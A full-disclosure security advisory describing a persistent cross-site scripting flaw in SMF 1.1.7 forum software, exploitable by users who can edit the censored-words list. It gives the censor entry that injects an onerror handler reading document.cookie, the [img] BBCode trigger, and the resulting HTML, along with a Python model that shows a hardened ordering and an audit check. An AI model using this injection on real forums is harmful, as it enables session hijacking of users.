
SMF 1.1.7 Persistent XSS (requires permission to edit censor)



SMF 1.1.7 (simplemachines.org) XSS

Exploitation:

If you can modify the censor (the censored-words list) on an SMF forum,
then you can make the forum execute arbitrary JS code.
http://SMF.Forum.com/index.php?action=postsettings;sa=censor 

Just add the following entry:
http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie) 

And then write a post, modify your signature, or send a PM with the code:
[img]http://www.test.xss/[/img] 

And the HTML code generated will be:
<img src="http://www.test-xss/" onerror="alert(document.cookie)" alt="" border="0" />
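
The behaviour described above, as an added example that is not part of the original advisory and is not SMF's code: a toy Python model that assumes the censor substitution runs on already-rendered HTML, shown beside a hardened ordering and a check for risky censor entries. All function names are hypothetical; the censor entry and post are the ones from the advisory.

```python
import html
import re

# Constructed data: the censor entry and post body from the advisory above.
CENSOR = {"http://www.test.xss/":
          'http://www.test-xss/" onerror="alert(document.cookie)'}
POST = "[img]http://www.test.xss/[/img]"

IMG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE)


def apply_censor(text, table):
    """Plain string substitution of every censored term."""
    for term, replacement in table.items():
        text = text.replace(term, replacement)
    return text


def render_bbcode(text):
    """Escape user text, then turn [img] into an <img> tag (toy renderer)."""
    escaped = html.escape(text, quote=True)
    return IMG.sub(r'<img src="\1" alt="" border="0" />', escaped)


def render_vulnerable(post, table):
    # Assumed flaw: censor runs on finished HTML, replacement is never escaped.
    return apply_censor(render_bbcode(post), table)


def render_hardened(post, table):
    # Censor runs on raw text, so the replacement is escaped with the post.
    return render_bbcode(apply_censor(post, table))


def risky_censor_entries(table):
    """Audit helper: terms whose replacement contains HTML metacharacters."""
    return [t for t, r in table.items() if re.search(r"[\"'<>]", r)]


if __name__ == "__main__":
    print(render_vulnerable(POST, CENSOR))
    print(render_hardened(POST, CENSOR))
    print(risky_censor_entries(CENSOR))
```

In the hardened output the quote characters arrive as &quot; and stay inside the src value; the audit helper can be run over an exported censor list to flag entries like this one.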

Notes:
 - SMF is not using httpOnly cookies.
 - I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..

Greetings!!
-- Eduardo
http://www.sirdarckcat.net/ 
